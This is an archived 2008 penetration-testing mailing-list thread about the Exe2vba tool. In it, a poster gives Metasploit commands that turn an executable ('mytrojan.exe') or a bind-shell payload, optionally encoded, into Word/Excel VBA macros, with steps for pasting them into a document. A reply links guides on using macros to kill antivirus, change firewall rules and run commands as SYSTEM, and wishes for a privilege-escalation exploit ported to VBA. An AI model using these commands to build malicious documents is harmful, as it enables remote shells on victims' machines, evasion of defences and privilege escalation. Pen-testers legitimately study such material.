Re: Exe2vba - Anybody still have this?



I wrote up a quick series of posts on how to use VBA to do all kinds
of things, as long as the user running the Excel/Word file has the
necessary rights. If anyone would find them useful:

Running commands or launching programs:
http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html

Downloading files and saving them to disk:
http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html

Running commands as SYSTEM:
http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

Killing off any antivirus that may be running:
http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html

Modifying the Windows Firewall:
http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html


What I would really love to see would be a combination of the
Churrasco exploit
(http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html)
into VBA, so that even if the user is running in a limited account,
they'd be able to gain SYSTEM privileges.

-n

On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist@xxxxxxxxxxxxxxxxxx> wrote:
Hi Joseph,

I added this to Metasploit. You can use the VBA generator in a few
different ways:

1) Convert an EXE to a VBA script (works on Word/Excel automatically):

$ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba

2) Create a VBA script that runs a Metasploit payload

$ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba

3) Create a VBA script that runs an encoded Metasploit payload

$ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
ruby msf3/msfencode -a x86 -b '' -t vba > output.vba

To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual
Basic Editor, paste in, save, and exit. Works pretty well here :-)

You need the latest SVN of Metasploit 3.2 trunk:
$ svn co http://metasploit.com/svn/framework3/trunk/

On Windows, follow this guide:
- http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN

-HD

On Tuesday 11 November 2008, Joseph McCray wrote:
It used to be located at:
http://www.priestmaster.org/tools.html

I've been looking all over the web and really haven't been able to find
this app anymore.


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------



Relevant Pages

  • RE: Exe2vba - Anybody still have this?
    ... I have used the concept as a .aspx shellcode launcher, ... another vector is VBA macros. ... Create a VBA script that runs an encoded Metasploit payload ... Security Trends Report from Cenzic ...
    (Pen-Test)
  • Re: Exe2vba - Anybody still have this?
    ... Convert an EXE to a VBA script: ... Create a VBA script that runs a Metasploit payload ... Security Trends Report from Cenzic ...
    (Pen-Test)
  • Re: Pros/Cons of having users Trust the VBA Project
    ... It's got nothing to do with the user running ... If they want to run macros in VBA then they have to check the box. ... "Barb Reinhardt" wrote: ...
    (microsoft.public.excel.programming)